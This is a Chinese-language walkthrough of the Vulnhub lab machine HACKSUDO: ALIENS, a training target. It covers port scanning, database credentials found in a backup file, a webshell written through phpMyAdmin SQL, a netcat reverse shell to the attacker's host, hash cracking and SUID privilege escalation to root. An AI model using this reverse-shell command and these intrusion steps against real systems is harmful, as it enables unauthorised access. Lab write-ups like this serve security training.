Vulnhub 靶場 HACKSUDO: ALIENS
阿新 • • 發佈:2022-04-15
前期準備:
靶機地址:https://www.vulnhub.com/entry/hacksudo-aliens,676/
kali攻擊機ip:192.168.11.128
靶機ip:192.168.11.145
一、資訊收集
1.使用nmap對目標靶機進行掃描
開了 22、80、9000埠。
2. 80埠
是一些關於目擊外星人的資料,檢視原始碼也沒發現什麼,掃一下目錄:
發現個遊戲:
不用怎麼動就能通關,不過通關了也沒發現什麼,看一下 /backup 目錄:
發現個 mysql.bak 檔案,下載下來檢視:
發現了資料庫的使用者名稱和密碼:
user="vishal"
password="hacksudo"
3. 9000埠
nmap掃的時候發現有 robots.txt 檔案:
什麼也沒有,用上面的使用者名稱密碼直接登入phpmyadmin:
二、漏洞利用
檢視可用的資訊:
有使用者和密碼的hash值,不過用不了,那就利用sql語句寫入一句話木馬:
GO 執行後訪問:
一句話木馬寫入成功,然後獲取反彈 shell,檢視是否有 nc:
利用 nc 反彈 shell並本地監聽:
nc -e /bin/bash 192.168.11.128 1234
nc 連線成功,升級一下 shell。
三、提權
檢視檔案沒發現什麼,檢視許可權和SUID檔案:
發現可以用 date,date 可以越權檢視檔案:
得到了 root 和 hacksudo 的密碼 hash,複製下來用 john 暴破一下:
root的密碼短時間沒有爆出來,hacksudo的密碼一下就出來了:aliens,那就 ssh 登入:
檢視許可權和 SUID 檔案:
有個二進位制檔案比較可疑。檢視一下:
在 gtfobins 上找到了它的提權方式:
提權到 root:
檢視 flag:
完成。